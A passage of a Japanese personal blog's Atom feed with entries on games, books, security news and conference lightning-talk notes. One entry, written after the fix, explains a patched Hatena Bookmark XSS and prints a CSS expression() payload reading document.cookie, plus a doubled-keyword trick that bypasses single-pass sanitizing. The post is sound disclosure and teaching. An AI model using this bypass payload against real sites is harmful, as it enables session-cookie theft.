/></span></li></ul><p>倒叙もの。誰が犯人なのか、どうやったのかは分かっていて……最大の問題は、なぜ犯人は時間稼ぎをしようとしているのか。</p><p>しかし、解説にもありますが、その動機がちょっと理解しがたい感じではあります。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3562/comment">「扉は閉ざされたまま」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%9C%AC">本</a> / <a href="../genre/%E8%B2%B7%E3%81%84%E7%89%A9">買い物</a></span></p></div></div></content></entry><entry><title>はてなのexpressionのXSSが修正された</title><link href="http://bakera.jp/ebi/topic/3561" /><id>tag:bakera.jp,2008:/ebi/topic/3561</id><updated>2009-03-31T10:25:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/3/30">2009年3月30日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3561">はてなのexpressionのXSSが修正された</a></h2><p class="subinfo"><span class="updated">更新: 2009年3月31日10時25分頃</span></p><p>はてなブックマークのスタイルシートに</p><div class="sample"><p>*{color:expression(alert(document.cookie))}</p></div><p>と書くと、「危険な文字」とみなされた "expression" と "cookie" が<dfn class="glossary"><a href="../../glossary/%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA">サニタイズ</a></dfn>されて以下のようになります。</p><div class="sample"><p>*{color:(alert(document.))}</p></div><p>この手のサニタイズでありがちな罠として、削除対象の文字列を一度しか走査しないで済ませてしまっている場合があります。たとえば、以下のように書いたとき、</p><div class="sample"><p>*{color:eexpressionxpression(alert(document.ccookieookie))}</p></div><p>削除のための走査を一度だけで済ませていると、expression と cookie が一度ずつ取り除かれて以下のようになります。</p><div class="sample"><p>*{color:expression(alert(document.cookie))}</p></div><p>というわけで、こんな感じで貫通してしまう場合があるのです。実際、はてなでは今日の20時頃まではこのパターンで貫通していましたが、現在では修正済みです。</p><p class="note">※全角の「ｅｘｐｒｅｓｓｉｏｎ」が貫通していた件も一緒に修正されたようです。</p><ul class="comment-link"><li><a href="../topic/3561/comment">「はてなのexpressionのXSSが修正された」へのコメント (5件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E8%84%86%E5%BC%B1%E6%80%A7">クロスサイトスクリプティング脆弱性</a></span></p></div></div></content></entry><entry><title>森の生活 95日目: カーニバル</title><link href="http://bakera.jp/ebi/topic/3528" /><id>tag:bakera.jp,2008:/ebi/topic/3528</id><updated>2009-02-25T23:43:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/2/23">2009年2月23日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3528">森の生活 95日目: カーニバル</a></h2><p class="subinfo"><span class="updated">更新: 2009年2月25日23時43分頃</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000IUATEO&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">街へいこうよ どうぶつの森</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000IUATEO" alt="" width="1" height="1" /></span>、95日目。</p><div class="figure"><img src="../img/ruu0079" alt="" width="450" height="241" /></div><p>起動すると村に謎の紙吹雪が舞っており、カーニバルなのですよ……。</p><div class="figure"><img src="../img/ruu0080" alt="" width="450" height="241" /></div><p>基本的には、クジャクのベルリーナがひたすら踊るイベントです。</p><div class="figure"><img src="../img/ruu0081" alt="" width="450" height="241" /></div><p>で、カーニバルシリーズの家具がもらえます。住人とゲームで勝負→勝つとアメをもらえる→特定の色のアメを3つ集めてベルリーナに渡す→家具ゲット、となるのですが。</p><p>この家具がまたランダムなので、かぶることかぶること。数時間かけて40個近くゲットしたのですが、結局、「カーニバルテーブルL」が一つもゲットできずにコンプリートは断念。カーニバルの床7つとか要らないし! (しかも床は売っても1800ベルと安い)</p><p>……っていうかですね、住人とのゲームがつまらないんですよ! ハッキリ言って苦痛なんですよ! ゲームと言ってもジャンケンとかコイン当てとかで、選択肢ランダムなのです。それを数回ならともかく、100回以上ですよ? まあ、結局、ボタン連打になりますわな。</p><p class="note">※というか、100回以上やってもコンプリートできない仕様がおかしいというか、ゆきだるまシリーズのようにカタログにないやつから優先的に渡してくれればいいのに……。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3528/comment">「森の生活 95日目: カーニバル」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/Wii">Wii</a> / <a href="../genre/%E4%BB%BB%E5%A4%A9%E5%A0%82">任天堂</a> / <a href="../genre/%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">どうぶつの森</a> / <a href="../genre/%E8%A1%97%E3%81%B8%E3%81%84%E3%81%93%E3%81%86%E3%82%88%20%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">街へいこうよ どうぶつの森</a></span></p></div></div></content></entry><entry><title>第4回まっちゃ445 ライトニングトーク</title><link href="http://bakera.jp/ebi/topic/3504" /><id>tag:bakera.jp,2008:/ebi/topic/3504</id><updated>2009-02-25T11:15:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/1/31">2009年1月31日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3504">第4回まっちゃ445 ライトニングトーク</a></h2><p class="subinfo"><span class="updated">更新: 2009年2月25日11時15分頃</span></p><p>第4回まっちゃ445に参加してみたので、まずはライトニングトークをざっとメモ。</p><div class="section"><h3 id="section24">ライトニングトーク1：「MD5コリジョンによる偽造SSL証明書について」（hitoさん）</h3><p>MD5な証明書の話。</p><ul><li>これはMD5の強衝突耐性が破られた話であって、弱衝突耐性が破られたわけではない。</li><li>つまり、同じハッシュ値を持つ2つの証明書を新しく作ることは可能だが、既存の証明書と同じハッシュ値を持つ証明書を作ることは困難。既に運用されている証明書に対して攻撃する手法ではないのだが、まともな日本語のドキュメントが出ていないため誤解されているようだ。</li><li>さらに通常、CAが発行する証明書のシリアルナンバーは予想不可能であるため、実際にコリジョンを起こすことは難しい。ただし、一部のCAはシリアルナンバーを連番にするなど予測可能であったため、それを利用して同一MD5ハッシュ値を持つ二つの証明書を新たに得ることが可能だった。それが問題となった。</li><li>問題の本質は、一部のCAが攻撃できるような運用をしていたということと、そもそもSerial値以外にランダム値がないということ。</li><li>CA側での対応策は進んでいる。利用者が特に対策する必要はない。</li></ul></div><div class="section"><h3 id="section25">ライトニングトーク2：「UNICODEによるXSSとSQLインジェクションの可能性」（徳丸浩さん）</h3><p>今日は漢字の人。ひらがなは攻撃者モード?</p><ul><li>0x5cと0xa5の多対一の変換。多対一変換が起きるかどうかは実装依存。
<ul><li>ASPなど : U+00A5→?</li><li>PHP : U+00A5→全角</li><li>Java: U+00A5→0x5c</li></ul></li><li>XSSはどうか? → JSの動的生成の場合のみ問題になる。動的生成するなと言いたいが……。</li><li>MS SQL Serverへのデータ格納時、Unicode文字データを格納する場合はnchar, nvarcharを使用する必要がある。そうでない場合CP932への変換が起こるっぽい。アクセントつき記号などが変換される。ブラックリストによるXSS対策 (たとえばはてなのCSSなど) の場合、XSS対策ルーチンを通過した後でSQL Serverに格納されてXSS、というパターンもありそう</li><li>対策としては、異なる文字集合への変換を極力しない</li></ul></div><div class="section"><h3 id="section26">ライトニングトーク3：「Sparkingしよう」（ゆまのさん）</h3><p>MS DreamSparkの話。</p><ul><li>学生対象の無償プログラムでVisual StudioやらSQL Serverやらいろいろ使える</li><li>国際学生証(ISIC)とメールアドレスが必要</li><li>手続きは一分で完了。Verify→国際学生証のID入力</li><li>商用利用は違反。STEM-D分野/非商用目的の調査目的に限定</li><li>卒業しても使用を続けられる</li><li>国際学生証は生協でもらえるほか、直接申請できる模様</li></ul><p>MSはなにげにブラウザ+OSのVMイメージも配布しているそうな。これは便利かも。</p></div><div class="section"><h3 id="section27">ライトニングトーク4：「振り込め詐欺が無くならない」</h3><p>振り込め詐欺の話。</p><ul><li>何故流行る? : 簡単なお仕事、初期投資が少ない、低リスクで億単位。創意工夫で頑張っただけ儲かる、やりがいのあるお仕事</li><li>手口: 初期→オレオレ、その後→警察役、弁護士役などが登場する劇場型、今→ATMまで出向かせて指示、何故か振り込んでしまう。関西人は古典的な手口には強かったが、還付詐欺には良く引っかかる</li><li>対策: 警察→メガバンクのATMに張り付き、出し子の写真公開。銀行→声かけを徹底、注意喚起メッセージ</li><li>対策の効果は? : 警官が張り付くと、指示はプレッシャー大。効果はあり</li><li>何故携帯電話? : 第三者に相談する隙を与えない。わざと小さな声で話して集中させたり。人間は、一度信用した人をあらためて疑うことはしないもの</li><li>ATM近辺でジャミングしたり、携帯が鳴ると注意喚起音声が流れるという対策もあるが……</li><li>何故徹底しない? : 偽造カードの場合は銀行システムの脆弱性であり、銀行に責任があると考えられる。それに対し、振り込め詐欺の場合、振り込むのは振り込み者の意思であるし、銀行を介さずにバイク便で回収するパターンもあり、銀行に責任はない。</li><li>振り込まれても、銀行は損しない。ジャミング→1台300万円、携帯使えないデメリットもある。どちらかというと、目新しい対策をしているというPR色が濃い。</li><li>日本でフィッシング詐欺が流行らない理由 : 振り込め詐欺でどーんと儲かるから。フィッシングは頑張っても1000万くらいが限界だが、振り込め詐欺は頑張れば億に届く。</li></ul></div><div class="section"><h3 id="section28">ライトニングトーク5：「ULCPCはDarwinの夢を見るか?」（yaizawaさん）</h3><p>ULCPCでMacOSXを動かす話。</p><ul><li>実験機材 : MSI Wind Notebook (送料込みで44,954円)</li><li>インストーラ : 汎用のKalyWayと専用のMSIWindosx86がある。後者は利用者少ない、今後が不安、カーネル互換性無い部分ありなので、KalyWayを採用</li><li>KalyWay の DVD ブートで普通にインストール可能。ただし標準装備の無線カードは使用不能で、Dell DW-1390 / DE-1490 への換装が必要</li><li>アップデートはいろいろ難しいらしい。10.5.5へのアップデートはカーネルパニックが起きるので一工夫必要</li><li>使い勝手 :  Safari は問題ない。Mac としては画面小さい。QuickTimeに負荷をかけるとカーネルパニック</li><li>ベンチマーク : 初代 Mac Mini に全てにおいて負けている</li><li>課題 : 10.5.6 へのアップデート、EULA対応</li></ul></div><div class="section"><h3 id="section29">ライトニングトーク6：「モテエンジニアのススメ」（kawaさん＠チームチドリ）</h3><ul><li>モテ力 = 魅力 * 出会い数 * 行動力。イチローでも3割</li><li>男と女は違う : TCP と UDP くらい違う。ポート 80 に HELO しても駄目</li><li>大きな違い : 幸せのツボのサイズが違う。スイートテンダイヤモンドは男性目線→毎日少しずつが大事</li><li>中身で判断して欲しい? : 不細工なツボは選んでもらえない</li><li>行動あるのみ : パケットを送らなきゃ始まらない。言い訳はいらない。行動しろ!</li><li>で、オチは?</li></ul></div><ul class="comment-link"><li><a href="../topic/3504/comment">「第4回まっちゃ445 ライトニングトーク」へのコメント (6件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%A1%E3%83%A2">メモ</a></span></p></div></div></content></entry><entry><title>森の生活 61日目: おうかん</title><link href="http://bakera.jp/ebi/topic/3494" /><id>tag:bakera.jp,2008:/ebi/topic/3494</id><updated>2009-01-23T23:15:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/1/20">2009年1月20日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3494">森の生活 61日目: おうかん</a></h2><p class="subinfo"><span class="updated">更新: 2009年1月23日23時15分頃</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B000IUATEO&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">街へいこうよ どうぶつの森</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B000IUATEO" alt="" width="1" height="1" /></span>、61日目。</p><p>「おうかん」が売りに出されていましたよ。</p><div class="figure"><img src="../img/ruu0072" alt="" width="450" height="241" /></div><p>お値段120万ベル。</p><div class="figure"><img src="../img/ruu0073" alt="" width="450" height="241" /></div><p>迷わず購入で。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3494/comment">「森の生活 61日目: おうかん」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/Wii">Wii</a> / <a href="../genre/%E4%BB%BB%E5%A4%A9%E5%A0%82">任天堂</a> / <a href="../genre/%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">どうぶつの森</a> / <a href="../genre/%E8%A1%97%E3%81%B8%E3%81%84%E3%81%93%E3%81%86%E3%82%88%20%E3%81%A9%E3%81%86%E3%81%B6%E3%81%A4%E3%81%AE%E6%A3%AE">街へいこうよ どうぶつの森</a></span></p></div></div></content></entry><entry><title>IPA職員がWinny経由で(?)情報流出</title><link href="http://bakera.jp/ebi/topic/3480" /><id>tag:bakera.jp,2008:/ebi/topic/3480</id><updated>2009-01-06T01:40:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2009/1/5">2009年1月5日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3480">IPA職員がWinny経由で(?)情報流出</a></h2><p class="subinfo"><span class="updated">更新: 2009年1月6日1時40分頃</span></p><p>おやまあ。</p><ul><li><a href="http://internet.watch.impress.co.jp/cda/news/2009/01/04/21994.html">IPA職員がファイル交換ソフトでウイルスに感染、写真など流出</a> <em class="domain-info">(internet.watch.impress.co.jp)</em></li><li><a href="http://www.ipa.go.jp/about/oshirase/20090104.html">IPA職員の私物パソコンによる情報流出について</a> <em class="domain-info">(www.ipa.go.jp)</em></li></ul><p>まとめサイトなどもできていたりするようですが……。「ファイル交換ソフト」は具体的にはWinnyらしいですね。IPA内部でWinnyが使われていた訳ではなくて、自宅で私物PCが感染してしまった模様。</p><p class="note">※<a href="../topic/2527">昔聞いた話</a>ではIPA内部ではWinnyは完全にNGで、<a href="http://jvn.jp/jp/JVN74294680/index.html">JVN#74294680 (Winny におけるバッファオーバーフローの脆弱性)</a> <em class="domain-info">(jvn.jp)</em>の検証を行うことさえ許されなかったらしいです。今どうなのかは分かりませんが、少なくとも無条件に許可されていたりはしないでしょう。</p><p class="note">※2009-01-06追記: WinnyではなくShareらしいという話もあるようです。<a href="http://japan.cnet.com/news/sec/story/0,2000056024,20385963,00.htm">「おそらくShare」　IPA職員が情報流出に使ったファイル交換ソフト</a> <em class="domain-info">(japan.cnet.com)</em></p><p>IPAの発表によると、</p><div class="quote-and-cite"><blockquote cite="http://www.ipa.go.jp/about/oshirase/20090104.html"><p>これにより、当該職員に関わる個人情報等や一部の公開画像が流出したと見られます。他方、これまでの調査では、当機構の業務関連の非公開情報は含まれておりませんが、さらに確認を行っているところです。</p></blockquote><p class="cite">以上、<a href="http://www.ipa.go.jp/about/oshirase/20090104.html">IPA職員の私物パソコンによる情報流出について</a> より</p></div><p>とのことで、IPAの業務に関する情報が漏洩したという話はないようです。とりあえず安心。</p><ul class="comment-link"><li><a href="../topic/3480/comment">「IPA職員がWinny経由で(?)情報流出」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Winny">Winny</a></span></p></div></div></content></entry><entry><title>IPAからの指摘を教訓に出来なかったのかもしれない靖国神社</title><link href="http://bakera.jp/ebi/topic/3465" /><id>tag:bakera.jp,2008:/ebi/topic/3465</id><updated>2008-12-26T16:30:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/12/25">2008年12月25日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3465">IPAからの指摘を教訓に出来なかったのかもしれない靖国神社</a></h2><p class="subinfo"><span class="updated">更新: 2008年12月26日16時30分頃</span></p><p>「<a href="http://www.itmedia.co.jp/news/articles/0812/25/news016.html">靖国神社サイトが改ざん</a> <em class="domain-info">(www.itmedia.co.jp)</em>」だそうで。</p><p>うーむ。今日、某所で「今年はIPAで脆弱性を取り扱ったサイトがやられちゃったりした」という話が出ていて、それは<a href="../topic/3196">アイリスプラザの件</a>だろうと思っていたわけですが。まさか、帰ってきたらこんな事が起きているとは。</p><p>靖国神社のサイトに関しては、2005年7月25日に<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>を1件、2006年8月15日にXSSを2件と<dfn class="glossary"><a href="../../glossary/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a></dfn>を1件、届け出ているわけですよ。届け出たSQLインジェクションについては2006年8月23日に修正完了しているのですが、別の場所にもあってそこがやられたとか? ……いや、しかし、SQLインジェクションが原因と決まったわけではないので、「IPAからの指摘を教訓に出来なかった」と決めつけるのは早いですね。この手の<dfn class="glossary"><a href="../../glossary/%E6%94%B9%E7%AB%84">改竄</a></dfn>だと、SQLインジェクションとは関係ない可能性の方が高そうな気がしますし。</p><p class="note">※まあ、いずれにしても、IPAから「脆弱なんだから気をつけてね」と複数回言われていたことは間違いないわけで、それがやられてしまったのは残念ではありますね。</p><p class="note">※2008-12-26追記: その後、システムリプレースされている模様です。: <a href="../topic/3468">靖国神社の改竄話つづき</a></p><ul class="comment-link"><li><a href="../topic/3465/comment">「IPAからの指摘を教訓に出来なかったのかもしれない靖国神社」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/SQL%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3">SQLインジェクション</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a></span></p></div></div></content></entry><entry><title>DNSプリフェッチ</title><link href="http://bakera.jp/ebi/topic/3462" /><id>tag:bakera.jp,2008:/ebi/topic/3462</id><updated>2008-12-26T02:25:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/12/24">2008年12月24日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3462">DNSプリフェッチ</a></h2><p class="subinfo"><span class="updated">更新: 2008年12月26日2時25分頃</span></p><p>「<a href="http://www.atmarkit.co.jp/news/analysis/200812/22/chrome.html">Chromeはなぜ速いのか</a> <em class="domain-info">(www.atmarkit.co.jp)</em>」。</p><div class="quote-and-cite"><blockquote><p>DNSプリフェッチは、表示されているページ中のリンクだけでなく、起動時のスタートページに関しても行うほか、ユーザーがURLや検索文字列をタイプしている最中でも行っているという。サジェスト機能でどこかのWebページを提示した場合にもプリフェッチをしているという。ユーザーがリターンキーを押すよりも先に、すでにWebブラウザはユーザーが次に訪れそうなドメインのIPアドレスを取得済みというわけだ。</p></blockquote></div><p><a href="../topic/3349">インクリメンタルな感じで名前解決しちゃう</a>話ですね。「DNSプリフェッチ」と呼んでいるようで。</p><p>しかしこれ、DNSサーバを管理する側は困らないのですかね。</p><p>昔、プリフェッチャというのが結構流行っていた時代がありましたが、HTTPのプリフェッチの場合、行儀の悪いプリフェッチャはUser-Agentを見て蹴ったりできたわけです。しかしDNSクエリにはUser-Agentなんてものは無く……。</p><p class="note">※とは言っても、大変なのはChromeを使っている人が使っているDNSキャッシュサーバであって、DNSコンテンツサーバにはそんなに影響がないような気もするので、実はそんなに困らないのかも。</p><p class="note">※2008-12-26追記: <a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/12.html#20081225__DNS2">セキュリティホールmemoのこじまさんのコメント</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>によると、「ふつうの ISP の DNS キャッシュサーバは、ふつうの人が思っているほどの性能の余裕はないみたい」だそうです。コメントありがとうございます。</p><ul class="comment-link"><li><a href="../topic/3462/comment">「DNSプリフェッチ」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/DNS">DNS</a> / <a href="../genre/Google%20Chrome">Google Chrome</a></span></p></div></div></content></entry><entry><title>MT管理画面の件がJVNで公開</title><link href="http://bakera.jp/ebi/topic/3299" /><id>tag:bakera.jp,2008:/ebi/topic/3299</id><updated>2008-12-03T15:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/10/17">2008年10月17日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3299">MT管理画面の件がJVNで公開</a></h2><p class="subinfo"><span class="updated">更新: 2008年12月3日15時55分頃</span></p><p>JVNで以下の情報が公開されました。</p><ul><li><a href="http://jvn.jp/jp/JVN81490697/index.html">JVN#81490697 Movable Type におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em></li><li><a href="http://jvndb.jvn.jp/ja/contents/2008/JVNDB-2008-000072.html">JVNDB-2008-000072 Movable Type におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvndb.jvn.jp)</em></li></ul><p>この情報公開に伴い、過去の日記に対して追記・修正を行いました。</p><ul><li><a href="../topic/3215">セキュリティアップデートの報告は内容が分かるようにしてほしい</a></li><li><a href="../topic/3239">MTのセキュリティ修正正式版</a></li><li><a href="../topic/3297">MT4.22のセキュリティ修正</a></li></ul><p>MT4.22 にこの修正が含まれているようですね。</p><p class="note">※2008-12-03追記: しかし、実はこの修正は不完全で、まだ脆弱性が残っていました。<a href="../topic/3431">MT4.23</a>でさらに修正されています。たぶん関連: 「<a href="http://rryu.sakura.ne.jp/nisenise-fuhito/2008/10/17/986.html">なかなか直らないMovable TypeのXSS脆弱性の訳</a> <em class="domain-info">(rryu.sakura.ne.jp)</em>」。</p><p class="note">※……また別途追記するかも。</p><ul class="comment-link"><li><a href="../topic/3299/comment">「MT管理画面の件がJVNで公開」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%E6%97%A9%E6%9C%9F%E8%AD%A6%E6%88%92%E3%83%91%E3%83%BC%E3%83%88%E3%83%8A%E3%83%BC%E3%82%B7%E3%83%83%E3%83%97">情報セキュリティ早期警戒パートナーシップ</a> / <a href="../genre/Movable%20Type">Movable Type</a></span></p></div></div></content></entry><entry><title>クロスドメインのiframeにアドレスバーを出すのはどうか</title><link href="http://bakera.jp/ebi/topic/3419" /><id>tag:bakera.jp,2008:/ebi/topic/3419</id><updated>2008-12-03T02:10:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/29">2008年11月29日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3419">クロスドメインのiframeにアドレスバーを出すのはどうか</a></h2><p class="subinfo"><span class="updated">更新: 2008年12月3日2時10分頃</span></p><p>「<a href="http://slashdot.jp/security/08/11/28/0255251.shtml">はてなブックマークの新しい登録ブックマークレットは危険</a> <em class="domain-info">(slashdot.jp)</em>」。<a href="../topic/3411">クロスドメインの疑似ダイアログ話</a>ですが、興味深いお話が。</p><div class="quote-and-cite"><blockquote cite="http://slashdot.jp/security/comments.pl?sid=428647&amp;cid=1463675"><p>Operaはポップアップウインドウでも、ウインドウ内の一部をクリックするだけでアドレスバーが表示できたりします。</p></blockquote><p class="cite">以上、<a href="http://slashdot.jp/security/comments.pl?sid=428647&amp;cid=1463675">一方Operaは(激しくオフトピ)</a> より</p></div><p>この話はポップアップではありませんし単純な<dfn class="element"><a href="../../ref/html/element/iframe">iframe</a></dfn>でもないのですが、とりあえずのブラウザ側の対応として、「クロスドメインのiframeには無理矢理アドレスバーを表示する」という処理があっても良いのかもしれないと思いました。</p><p>もっとも、iframeを使わずにブックマークレットのJSで<dfn class="element"><a href="../../ref/html/element/form">form要素</a></dfn>をいきなり動的生成することも可能で、そのような場合には対応できませんが……。</p><p>あと、表示の仕方が問題ですね。Webページ側で偽装されないようにする必要があるので、いわゆるchrome領域に表示するとなると……iframeの数だけアドレスバー増殖? やってやれないことはないようにも思いますが、大変なことになりそうですね。</p><p class="note">※いずれにしても、そんな実装をすると隠しiframeで非同期通信する技を使っているサイトが大変みっともないことになり、結構困るかも。</p><p class="note">※2008-12-03追記: そもそもブックマークレットでiframeが追加されること自体イレギュラーですから、「ブックマークレットによって追加されたiframeのドメインを確認できる機能」なんてのは必要ないのではないか、と言われればその通りだと思います。ブラウザが今後このような備えていくべきだ……というような意気込みはなく、こんな機能があっても面白いのではないか、という程度の話です。</p><ul class="comment-link"><li><a href="../topic/3419/comment">「クロスドメインのiframeにアドレスバーを出すのはどうか」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>とらドラ7!</title><link href="http://bakera.jp/ebi/topic/3418" /><id>tag:bakera.jp,2008:/ebi/topic/3418</id><updated>2008-11-30T15:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/29">2008年11月29日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3418">とらドラ7!</a></h2><p class="subinfo"><span class="updated">更新: 2008年11月30日15時20分頃</span></p><p>読み終わったのでメモ。</p><ul><li><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/4048670190&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">とらドラ7!</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=4048670190" alt="" width="1" height="1" /></span></li></ul><p>ここで来ましたか……。やっと来ましたか……。</p><p>北村にも櫛枝にも最初から、それこそ1巻の時点から分かっていたことですが、ここで本人がようやく気づいてしまったわけですね。</p><p>櫛枝はそんな大河の気持ちを分かっているから苦しんでいたわけで、まあ、やっぱりというか、こうなるしかない流れですね。</p><p class="note">※ところで、水星の逆行って……内惑星って逆行するのでしたっけ? 逆行ってのは外惑星 (地球より外側を公転している惑星) だけの現象だったような気がするのですが、どうでしたっけ。</p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/3418/comment">「とらドラ7!」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%9C%AC">本</a> / <a href="../genre/%E8%B2%B7%E3%81%84%E7%89%A9">買い物</a> / <a href="../genre/%E3%81%A8%E3%82%89%E3%83%89%E3%83%A9!">とらドラ!</a></span></p></div></div></content></entry><entry><title>怪談: SQLインジェクションの恐怖</title><link href="http://bakera.jp/ebi/topic/3387" /><id>tag:bakera.jp,2008:/ebi/topic/3387</id><updated>2008-11-19T20:10:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/17">2008年11月17日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3387">怪談: SQLインジェクションの恐怖</a></h2><p class="subinfo"><span class="updated">更新: 2008年11月19日20時10分頃</span></p><p><a href="http://d.hatena.ne.jp/ockeghem/20081117/p1">神戸デジタル・ラボの「セルフチェックかんたん5」は試すな危険</a> <em class="domain-info">(d.hatena.ne.jp)</em>。</p><div class="quote-and-cite"><blockquote><p>ところが、同じチェックシートの『チェック3「内部データをのぞき見されているかもしれない」チェック』は、益は少しあるかもしれないが、それ以上に予期しないトラブル、具体的にはデータベースの破壊を招きかねないという点で、けっして「かんたん」というものではない。</p><p 